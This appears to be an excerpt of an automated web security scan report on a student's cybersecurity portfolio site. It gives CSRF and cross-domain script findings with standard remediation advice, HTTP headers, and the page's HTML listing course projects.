          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

      2. Cross-Domain JavaScript Source File Inclusion (2)
        1. GET https://beekmans.dev
          Alert tags
          Alert description

          The page includes one or more script files from a third-party domain.

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
